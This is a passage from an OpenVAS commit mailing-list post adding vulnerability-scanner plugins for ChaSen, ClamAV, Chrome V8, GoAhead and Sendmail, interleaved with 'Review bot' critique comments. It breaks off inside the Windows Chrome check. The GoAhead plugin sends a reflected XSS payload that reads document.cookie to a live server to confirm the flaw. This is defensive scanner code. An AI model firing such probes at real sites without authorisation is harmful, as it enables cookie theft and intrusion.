[Openvas-commits] r12171 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Wed Nov 23 15:12:52 CET 2011


Author: antu123
Date: 2011-11-23 15:12:45 +0100 (Wed, 23 Nov 2011)
New Revision: 12171

Added:
   trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl
   trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl
   trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl
   trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl
Log:
Added new plugins and updated gb_sendmail_mail_relay_vuln.nasl

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/ChangeLog	2011-11-23 14:12:45 UTC (rev 12171)
@@ -1,3 +1,19 @@
+2011-11-23 Antu Sanadi <santu at secpod.com>
+
+	* scripts/gb_chasen_bof_vuln_win.nasl,
+	scripts/gb_chasen_bof_vuln_lin.nasl,
+	scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl,
+	scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl,
+	scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl,
+	scripts/secpod_clamav_recursion_dos_vuln_win.nasl,
+	scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl,
+	scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl,
+	scripts/secpod_goahead_webserver_mult_xss_vuln.nasl:
+	Added new plugins.
+
+	* scripts/gb_sendmail_mail_relay_vuln.nasl:
+	Added CVE-2003-0285 and updated description.
+
 2011-11-23  Jan-Oliver Wagner <jan-oliver.wagner at greenbone.net>
 
 	* scripts/secpod_qemu_detect_lin.nasl: Revised according to CR#57.

Added: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,103 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_chasen_bof_vuln_lin.nasl 18445 2011-11-11 11:11:11Z nov $
+#
+# ChaSen Buffer Overflow Vulnerability (Linux)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802344);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-4000");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-11 14:20:07 +0530 (Fri, 11 Nov 2011)");
+  script_name("ChaSen Buffer Overflow Vulnerability (Lindows)");
+  desc = "
+  Overview: The host is running ChaSen Software and is prone to buffer
+  overflow vulnerability
+
+  Vulnerability Insight:
+  The flaw is caused due to an error when reading user-supplied input string,
+  which allows attackers to execute arbitrary code via a crafted string.
+
+  Impact:
+  Successful exploitation allows remote attackers to cause a buffer overflow
+  or execute arbitrary code.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  ChaSen Version 2.4.x
+
+  Fix: Use ChaSen Version 2.3.3,
+  For Updates Refer, http://chasen.naist.jp/hiki/ChaSen/
+
+  References:
+  http://jvn.jp/en/jp/JVN16901583/index.html
+  http://jvndb.jvn.jp/en/contents/2011/JVNDB-2011-000099.html ";
+
+  script_description(desc);
+  script_summary("Check for the vulnerable ChaSen version");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Buffer overflow");
+  exit(0);
+}
+
+include("ssh_func.inc");
+include("version_func.inc");
+
+## Open the socket
+sock = ssh_login_or_reuse_connection();
+if(!sock){
+  exit(0);
+}
+
+## Confirm Linux, as SSH can be instslled on Windows as well
+result = ssh_cmd(socket:sock, cmd:"uname");
+if("Linux" >!< result){
+  exit(0);
+}
+
+chaName = find_file(file_name:"chasen-config", file_path:"/", useregex:TRUE,
+                         regexpar:"$", sock:sock);
+
+foreach binaryName (chaName)
+{
+  ## Get the ChaSen version from command
+  chaVer = get_bin_version(full_prog_name:chomp(binaryName), version_argv:"--version",
+                             ver_pattern:"[0-9.]+", sock:sock);
+
+  ## Check for ChaSen Version 2.4.x
+  if(chaVer[1] != NULL)
+  {
+    if(version_in_range(version:chaVer[1], test_version:"2.4.0", test_version2:"2.4.4"))
+    {
+      security_hole(0);
+      ssh_close_connection();
+      exit(0);
+    }
+  }
+}
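Review bot: The `script_name(...)` line reads "(Lindows)" while the file header and the Windows sibling say "(Linux)"; change it to `script_name("ChaSen Buffer Overflow Vulnerability (Linux)");`. `ssh_close_connection()` is called only inside the `security_hole` branch, so a host that is not vulnerable leaves the `foreach` with the session still open — either close on both paths (add `ssh_close_connection();` after the loop) or on neither, depending on whether the shared connection is meant to be reused. The Fix text recommends ChaSen 2.3.3 while the affected range tested is 2.4.0–2.4.4, i.e. it advises a downgrade; confirm against the referenced JVN advisory whether a fixed release should be named instead (the same text appears in gb_chasen_bof_vuln_win.nasl). The comment `## Confirm Linux, as SSH can be instslled on Windows as well` has a typo: `installed`.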


Property changes on: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Added: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,96 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_chasen_bof_vuln_win.nasl 18445 2011-11-10 17:14:14Z nov $
+#
+# ChaSen Buffer Overflow Vulnerability (Windows)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802343);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-4000");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-09 16:19:55 +0530 (Wed, 09 Nov 2011)");
+  script_name("ChaSen Buffer Overflow Vulnerability (Windows)");
+  desc = "
+  Overview: The host is running ChaSen Software and is prone to buffer
+  overflow vulnerability
+
+  Vulnerability Insight:
+  The flaw is caused due to an error when reading user-supplied input string,
+  which allows attackers to execute arbitrary code via a crafted string.
+
+  Impact:
+  Successful exploitation allows remote attackers to cause a buffer overflow
+  or execute arbitrary code.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  ChaSen Version 2.4.x
+
+  Fix: Use ChaSen Version 2.3.3,
+  For Updates Refer, http://chasen.naist.jp/hiki/ChaSen/
+
+  References:
+  http://jvn.jp/en/jp/JVN16901583/index.html
+  http://jvndb.jvn.jp/en/contents/2011/JVNDB-2011-000099.html ";
+
+  script_description(desc);
+  script_summary("Check for the vulnerable ChaSen version");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Buffer overflow");
+  script_dependencies("secpod_reg_enum.nasl");
+  script_require_ports(139, 445);
+  exit(0);
+}
+
+include("smb_nt.inc");
+include("version_func.inc");
+include("secpod_smb_func.inc");
+
+## Check for Windows
+if(!get_kb_item("SMB/WindowsVersion")){
+  exit(0);
+}
+
+key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\chasen";
+if(!registry_key_exists(key:key)){
+  exit(0);
+}
+
+## Get ChaSen version from registry
+chaName = registry_get_sz(key:key, item:"DisplayName");
+if("ChaSen" >< chaName)
+{
+  chaVer = eregmatch(pattern:"ChaSen ([0-9.]+)", string:chaName);
+  if(chaVer[1] != NULL)
+  {
+    if(version_in_range(version:chaVer[1], test_version:"2.4.0", test_version2:"2.4.4")){
+      security_hole(0);
+    }
+  }
+}
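Review bot: The description block declares `script_dependencies("secpod_reg_enum.nasl")` but no `script_require_keys("SMB/WindowsVersion")`, even though the body exits unless that KB key is set; the other SecPod checks in this commit pair the two (e.g. secpod_clamav_recursion_dos_vuln_win.nasl), so add `script_require_keys("SMB/WindowsVersion");` after the dependencies line so the scanner skips the script when the key is absent instead of launching it. The registry lookup covers only `SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\chasen`; whether ChaSen registers under exactly that key name on every supported Windows build (including the 32-bit view on 64-bit systems) is not established here, so confirm it against a real install before treating a missing key as "not installed".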


Property changes on: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Modified: trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -28,8 +28,8 @@
 {
   script_id(802194);
   script_version("$Revision$");
-  script_cve_id("CVE-2002-1278");
-  script_bugtraq_id(6118);
+  script_cve_id("CVE-2002-1278", "CVE-2003-0285");
+  script_bugtraq_id(6118, 7580);
   script_tag(name:"cvss_base", value:"7.5");
   script_tag(name:"risk_factor", value:"High");
   script_tag(name:"last_modification", value:"$Date$");
@@ -56,10 +56,14 @@
   Affected Software/OS:
   Linuxconf versions 1.24 r2, 1.2.5 r3
   Linuxconf versions 1.24 r2, 1.2.5 r3 on Conectiva Linux 6.0 through 8
+  IBM AIX versions 4.3, 4.3.1, 4.3.2, 4.3.3, 5.1, 5.1 L, 5.2
 
   Fix: Upgrade to the latest version of Linuxconf version 1.29r1 or later
   For updates refer, http://www.solucorp.qc.ca/linuxconf/
 
+  For IBM AIX, apply the patch from below link
+  ftp://aix.software.ibm.com/aix/efixes/security/sendmail_3_mod.tar.Z
+
   References:
   http://osvdb.org/6066
   http://xforce.iss.net/xforce/xfdb/10554
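Review bot: The new Affected/Fix paragraphs add IBM AIX to a script whose detection logic lies outside these hunks and whose existing text is about Linuxconf; if the body only fingerprints Linuxconf, or runs a relay probe that is not specific to AIX sendmail, the CVE-2003-0285 and BID 7580 references added in the first hunk are claimed without a corresponding check, so confirm the detection actually covers the AIX case. Wording: `For IBM AIX, apply the patch from below link` reads better as `For IBM AIX, apply the patch from the link below`. The `desc` string these lines belong to starts and ends outside the hunk.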

Added: trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_clamav_recursion_dos_vuln_win.nasl 18582 2011-11-22 17:51:52Z nov $
+#
+# ClamAV Recursion Level Handling Denial of Service Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902760);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-3627");
+  script_bugtraq_id(50183);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-22 17:51:52 +0530 (Tue, 22 Nov 2011)");
+  script_name("ClamAV Recursion Level Handling Denial of Service Vulnerability (Windows)");
+  desc = "
+  Overview: The host is installed with ClamAV and is prone to denial of service
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to the way the bytecode engine handled recursion
+  level when scanning an unpacked file.
+
+  Impact:
+  Successful exploitation will let the attackers to cause a denial of service
+  (crash) via vectors related to recursion level.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  ClamAV before 0.97.3 on Windows.
+
+  Fix: Upgrade to ClamAV version 0.97.3 or later
+  For updates refer, http://www.clamav.net/lang/en/download/
+
+  References:
+  http://www.ubuntu.com/usn/USN-1258-1/
+  https://bugzilla.redhat.com/show_bug.cgi?id=746984
+  http://git.clamav.net/gitweb?p=clamav-devel.git;a=commitdiff;h=3d664817f6ef833a17414a4ecea42004c35cc42f ";
+
+  script_description(desc);
+  script_summary("Check for the Version of ClamAV");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Denial of Service");
+  script_dependencies("gb_clamav_detect_win.nasl");
+  script_require_keys("ClamAV/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+avVer = get_kb_item("ClamAV/Win/Ver");
+if(avVer == NULL){
+  exit(0);
+}
+
+if(version_is_less(version:avVer, test_version:"0.97.3")){
+  security_warning(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Added: trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,100 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_goahead_webserver_mult_xss_vuln.nasl 18585 2011-11-23 12:12:12Z nov $
+#
+# GoAhead WebServer 'name' and 'address' Cross-Site Scripting Vulnerabilities
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902589);
+  script_version("$Revision$");
+  script_bugtraq_id(50729);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-23 12:12:12 +0530 (Wed, 23 Nov 2011)");
+  script_name("GoAhead WebServer 'name' and 'address' Cross-Site Scripting Vulnerabilities");
+  desc = "
+  Overview: This host is running GoAhead Webserver and is prone to multiple
+  cross site scripting vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are caused due to improper validation of user-supplied input
+  via the 'name' and 'address' parameters in goform/formTest, which allows
+  attackers to execute arbitrary HTML and script code in a user's browser
+  session in the context of an affected site.
+
+  Impact:
+  Successful exploitation will allow remote attackers to insert arbitrary HTML
+  and script code, which will be executed in a user's browser session in the
+  context of an affected site.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  GoAhead Webserver version 2.5
+
+  Fix: No solution or patch is available as on 23rd November 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.goahead.com/products/webserver/default.aspx
+
+  References:
+  http://osvdb.org/77198
+  http://secunia.com/advisories/46896
+  http://webserver.goahead.com/forum/topic/169 ";
+
+  script_description(desc);
+  script_summary("Check if GoAhead Webserver is vulnerable to Cross-Site Scripting");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web Servers");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+## Check Banner And Confirm Application
+banner = get_http_banner(port:port);
+if("Server: GoAhead-Webs" >!< banner) {
+  exit(0);
+}
+
+## Construct Attack Request
+url = "/goform/formTest?name=<script>alert(document.cookie)</script>";
+
+## Try XSS attack and check the response to confirm vulnerability
+if(http_vuln_check(port:port, url:url, check_header: TRUE,
+                   pattern:"Name: <script>alert\(document.cookie\)</script>")){
+  security_warning(port);
+}
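Review bot: The request probes only the `name` parameter of `/goform/formTest` while the title and description claim both `name` and `address`; either document that only `name` is exercised or narrow the claim, so a positive result is not reported for a parameter that was never tested. In the `pattern:` argument the `.` in `document.cookie` is unescaped and therefore matches any character; `pattern:"Name: <script>alert\(document\.cookie\)</script>"` is the exact match intended. The `<` and `>` go into the request line unencoded; whether `http_vuln_check` encodes the URL is not visible here, so confirm that a server rejecting raw angle brackets does not yield a silent false negative.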


Property changes on: trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Added: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl 18583 2011-11-21 17:43:12 nov $
+#
+# Google Chrome V8 Remote Code Execution Vulnerability (Linux)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902636);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-3900");
+  script_bugtraq_id(50701);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-11 11:11:11 +0530 (Mon, 14 Nov 2011)");
+  script_name("Google Chrome V8 Remote Code Execution Vulnerability (Linux)");
+  desc = "
+  Overview: The host is installed with Google Chrome and is prone to remote
+  code execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to an out-of-bounds write operation error in V8
+  (JavaScript engine) causing memory corruption.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code,
+  cause a denial of service.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Google Chrome version prior to 15.0.874.121 on Linux
+
+  Fix: Upgrade to the Google Chrome 15.0.874.121 or later,
+  For updates refer, http://www.google.com/chrome
+
+  References:
+  http://osvdb.org/show/osvdb/77193
+  http://secunia.com/advisories/46889/
+  http://googlechromereleases.blogspot.com/2011/11/stable-channel-update_16.html ";
+
+  script_description(desc);
+  script_summary("Check the version of Google Chrome");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("General");
+  script_dependencies("gb_google_chrome_detect_lin.nasl");
+  script_require_keys("Google-Chrome/Linux/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("Google-Chrome/Linux/Ver");
+if(!chromeVer){
+  exit(0);
+}
+
+## Check for Google Chrome Version less than 15.0.874.121
+if(version_is_less(version:chromeVer, test_version:"15.0.874.121")){
+  security_hole(0);
+}
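Review bot: The `creation_date` value `2011-11-11 11:11:11 +0530 (Mon, 14 Nov 2011)` is internally inconsistent — the ISO date and the bracketed date differ by three days — and secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl carries the same field with an impossible time `17:153:15`; both should be a single valid timestamp in the form the macosx sibling uses, `2011-11-21 17:55:43 +0530 (Mon, 21 Nov 2011)`. The `$Id` line in all three Chrome headers lacks the `Z` before the author that the other headers in this commit have, which suggests hand editing; since the property change below sets `svn:keywords` to `Revision Date` only, svn will not rewrite `$Id`, so it should be corrected by hand or dropped.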


Property changes on: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Added: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl 18583 2011-11-21 17:55:43 nov $
+#
+# Google Chrome V8 Remote Code Execution Vulnerability (Mac OS X)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902637);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-3900");
+  script_bugtraq_id(50701);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-21 17:55:43 +0530 (Mon, 21 Nov 2011)");
+  script_name("Google Chrome V8 Remote Code Execution Vulnerability (Mac OS X)");
+  desc = "
+  Overview: The host is installed with Google Chrome and is prone to remote
+  code execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to an out-of-bounds write operation error in V8
+  (JavaScript engine) causing memory corruption.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code,
+  cause a denial of service.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Google Chrome version prior to 15.0.874.121 on Mac OS X
+
+  Fix: Upgrade to the Google Chrome 15.0.874.121 or later,
+  For updates refer, http://www.google.com/chrome
+
+  References:
+  http://osvdb.org/show/osvdb/77193
+  http://secunia.com/advisories/46889/
+  http://googlechromereleases.blogspot.com/2011/11/stable-channel-update_16.html ";
+
+  script_description(desc);
+  script_summary("Check the version of Google Chrome");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("General");
+  script_dependencies("gb_google_chrome_detect_macosx.nasl");
+  script_require_keys("GoogleChrome/MacOSX/Version");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("GoogleChrome/MacOSX/Version");
+if(!chromeVer){
+  exit(0);
+}
+
+## Check for Google Chrome Version less than 15.0.874.121
+if(version_is_less(version:chromeVer, test_version:"15.0.874.121")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Added: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl 18583 2011-11-21 17:12:14 nov $
+#
+# Google Chrome V8 Remote Code Execution Vulnerability (Windows)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902635);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-3900");
+  script_bugtraq_id(50701);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-21 17:153:15 +0530 (Mon, 21 Nov 2011)");
+  script_name("Google Chrome V8 Remote Code Execution Vulnerability (Windows)");
+  desc = "
+  Overview: The host is installed with Google Chrome and is prone to remote
+  code execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to an out-of-bounds write operation error in V8
+  (JavaScript engine) causing memory corruption.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code,
+  cause a denial of service.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Google Chrome version prior to 15.0.874.121 on Windows
+
+  Fix: Upgrade to the Google Chrome 15.0.874.121 or later,
+  For updates refer, http://www.google.com/chrome
+
+  References:
+  http://osvdb.org/show/osvdb/77193
+  http://secunia.com/advisories/46889/
+  http://googlechromereleases.blogspot.com/2011/11/stable-channel-update_16.html ";
+
+  script_description(desc);
+  script_summary("Check the version of Google Chrome");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("General");
+  script_dependencies("gb_google_chrome_detect_win.nasl");
+  script_require_keys("GoogleChrome/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("GoogleChrome/Win/Ver");
